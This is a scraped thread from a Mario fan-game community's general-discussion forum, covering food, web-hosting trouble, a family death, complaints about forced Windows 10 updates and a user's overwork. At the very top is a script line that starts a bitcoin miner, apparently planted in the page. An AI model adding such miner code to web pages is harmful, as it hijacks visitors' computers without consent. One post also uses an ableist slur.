<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

talkhaus thoughts

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
GlitchedGhost

Re: Twitter Thread

Postby GlitchedGhost » 4 years ago

I had Chinese for lunch from a place that I haven't eaten at for a few years and tbh everything tasted different that I swear it wasn't the same place
2/10
Alice wrote:The really annoying part is that everything except the forums seems to work fine. All my uploaded files, the Distorted Travesty stuff I setup for Zephyr which also includes a SQL database to track download amounts. It's only the forums that seems to have an issue and it seems to be an issue with the server itself so I can't fix it from my end. Their support techs would need to look into it but apparently they're too busy doing who knows what to even respond, let alone in a timely manner. It'll be a pain to figure it all out but I very seriously doubt we'll be sticking with this host once our prepaid time is up in November or December. I'll need to look into a hosting service that isn't total garbage.
What the fuck?
This host is being garbage. I hope we can get a new one that isn't absolutely terrible
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

HatKid
Pronouns: she/her

Postby HatKid » 4 years ago

Cold Steel II hype is sky high now

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 4 years ago

amazon announced that they're doing another prime day

get ready to disappointedly browse the online K-Mart clearance aisle once more
ImageImage Image ImageImageImageImageImageImage

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 4 years ago

HatKid wrote:Cold Steel II hype is sky high now
YES

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 4 years ago

I just found out my uncle Phillip is dead :'( he was grandpa's sisters husband, and he was really nice. He was a radio announcer several years ago for the Miami Dolphins, and Marlins.
That crazy voice dude

Ashan
The world has become a place

Postby Ashan » 4 years ago

James Avery died a couple years ago. Didn't know he was a radio announcer though.

Mata Hari

Postby Mata Hari » 4 years ago

Here is a deep question for alla y'alls: to what extent do you think it is possible to choose how we feel?

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 4 years ago

So the new Independence Day movie was certainly a thing.

I give it a 4/7, see it with your friends.

freakin whatzit
welcome to th :|
First name: alex
Pronouns: they or she

Postby freakin whatzit » 4 years ago

Mata Hari wrote:Here is a deep question for alla y'alls: to what extent do you think it is possible to choose how we feel?
the extent to which you can care about whatever it is.

but like, in reverse order. the less you care, the more you can calmly decide your feelings.
I AM VERY DISGUSTED WITH THE TRASHY MAN. IN SPITE OF THE MONSTER, AND THE COACH, ONLY TRASHY, I WILL BEAT DOWN THEM ALL. FOR THIS I MUST STRENGTHEN MYSELF. THE MONSTER IS THE SAME TOO. COLLECT ALL THE TRASHY, RIGHTEOUS FELLOW ARE ALL UNPARDONABLE! YOU DON'T AFFECT ME. THE TRASHY STROLLING IS AN EYESORE!

Le Neveu de Rameau
I'm a hoobsie roller; I got robots in my life
First name: Rameau's Nephew

Postby Le Neveu de Rameau » 4 years ago

I don't think you can really (directly) control your immediate reaction to a particular event, but you may well be able to control your reaction to that reaction, so to speak, which can determine how those feelings develop from that more uncontrollable starting point. More indirectly, you can also probably condition yourself (deliberately or inadvertently) to react in a particular way to a particular stimulus, so as to shape your immediate reaction in a different direction (even if you still won't have much direct influence over it at the actual time you're reacting). But even the most disciplined person is still going to have moments where their visceral reaction is at odds with what their rational brain thinks. In those cases, the best we can do is control how we act upon our feelings, and wait for them to subside to such a degree that Ol' Brainy McGee can reclaim the driver's seat.

Mata Hari

Ol' Brainy Bastard

Mata Hari

I have another deep question, namely: is being good at stuff overrated?

sonicspin
wishes
Banned
First name: t
Pronouns: whatever

Postby sonicspin » 4 years ago

Mata Hari wrote:I have another deep question, namely: is being good at stuff overrated?
i'd say, yes, but the thing is, being good at stuff is good, because then you can consequently suck at that thing while knowing which suckiness will not work and which will
d̀͢͏̷͢ȩ̢͡͞͠-̸̢͟҉g̶̡͟͞҉e͞͏͞͞͠n͢҉e̸̛͠͞r͟á̡͠͡ţ̛́͜i̧̛o̵̢ń̴͠͝͝
dA

Falky
Space Mountain, Real World's Champion, WOOOOO etc
Pronouns: he/him/his

Postby Falky » 4 years ago

Telamon wrote:Plus, Northern Ireland, Wales and Scotland all made it as far or farther.
Scotland didn't qualify.
Image Image
Image Image
Image Image
Image Image

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 4 years ago

Falky wrote:
Telamon wrote:Plus, Northern Ireland, Wales and Scotland all made it as far or farther.
Scotland didn't qualify.
Yeah, I misremembered in my hurry to amplify England's embarrassment.

Le Neveu de Rameau
I'm a hoobsie roller; I got robots in my life
First name: Rameau's Nephew

Postby Le Neveu de Rameau » 4 years ago

I think Inverse Jesus got his hands on the bottle of wine I just opened before I did, because it tastes decidedly like water.

Whimsical Calamari

oh man
i missed the sound of rain on the roof

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 4 years ago

Le Neveu de Rameau wrote:I think Inverse Jesus got his hands on the bottle of wine I just opened before I did, because it tastes decidedly like water.
Or it could be pure alcohol.
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Ashan
The world has become a place

Postby Ashan » 4 years ago

I was featured on today's episode of Maddox's podcast (voicemail about 10 minutes in)
http://madcastmedia.com/shows/bestdebate/5/

Alice
Pronouns: Girl person

Postby Alice » 4 years ago

Man, Microsoft really did well with Windows 10. I mean it knows even better than I do when I want to update it. I never would have guessed that I'd want to update right in the middle of trying to play a game. (And I couldn't reschedule it. Windows flat out refuses to let me choose when to schedule updates for some retarded reason. The option to let me schedule them is greyed out.) Oh and did I mention this locked me out of my computer for two freaking hours because it was apparently the first service pack for Windows 10 or some shit? Great job making me want to use your worthless operating system Microsoft.

Mata Hari

That's why I'm not getting Windows 10. Why break what isn't fixed?

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 4 years ago

Alice wrote:Man, Microsoft really did well with Windows 10. I mean it knows even better than I do when I want to update it. I never would have guessed that I'd want to update right in the middle of trying to play a game. (And I couldn't reschedule it. Windows flat out refuses to let me choose when to schedule updates for some retarded reason. The option to let me schedule them is greyed out.) Oh and did I mention this locked me out of my computer for two freaking hours because it was apparently the first service pack for Windows 10 or some shit? Great job making me want to use your worthless operating system Microsoft.
Relevant

Alice
Pronouns: Girl person

Postby Alice » 4 years ago

Jesuiscontent wrote:Relevant

Luckily for me I don't even get that much, lol. I even have the "defer updates" option ticked and on top of this when I first got up I chose the "update and restart" option in the win+x menu and this still happened like 4-1/2 hours after I rebooted. Cause apparently the "update and restart/shutdown" options don't actually bother updating despite their label.

As for the video itself: I dunno about racist but I definitely felt like strangling someone. Preferably whatever moron is responsible for the way Windows 10 handles updates. Microsoft should have learned a different lesson from people not wanting to bother with updates. The solution was not to force them to update regardless of whatever they're doing. (Indeed it only makes me want to find a way to flat out break Windows' ability to update at all.) The proper solution would be to change the underlying structure of Windows so it doesn't require you to reboot in order to install 90% of them.
Alice wrote:it was apparently the first service pack for Windows 10 or some shit?
I actually looked it up and I'm not sure why this update took so long. The service pack update isn't until August. If normal updates take this long there's no way in hell I'm installing a service pack since those tend to take far longer than standard updates.

Whimsical Calamari

Jesuiscontent wrote: Relevant

just gonna put it out there that my antivirus makes use of that function of windows. there are times when it brings up that bar and says "NO YOU NEED TO UPDATE NOW" and microsoft had nothing to do with it, just the antivirus.

QubicTom
Pleasantly Confused
First name: Tom

Postby QubicTom » 4 years ago

Man, regarding the Windows stuff, I think I got lucky. My laptop is from work and thus has Windows 7 Enterprise Edition, which is the only version that doesn't get the free Windows 10 update. Yay! And by changing a few registry values, the computer cannot restart itself from updates ever. Now to hope the laptop never ever quits on me and it's all good! :lol:

Mandatory twitter thread complaint: Since February, my workweek has surpassed 80 hours per week (writing my thesis and doing stuff in my lab is 40 hours+, then a second job Thurs, Fri and Saturday which also takes 40 hours+, which pays rent while I finish the thesis, since I ran out of PhD funds a while ago.) Sometimes the exhaustion catches up on me. Both eyes have been red for nearly three days now due to the long hours and not sleeping due to all the work stuff on my mind. I've also lost 7% of my weight since starting the other job, since it's super stressful and absolutely not for me.

Anyways, it's good to throw stuff like this out into the aether to be swallowed up in the thousands of other posts. Feels good :D

Hope everyone else here is doing okay! Feel free to vent to me if you like! And as that minigame in AUS says: KEEP GOING!!

Return to “the gazebo”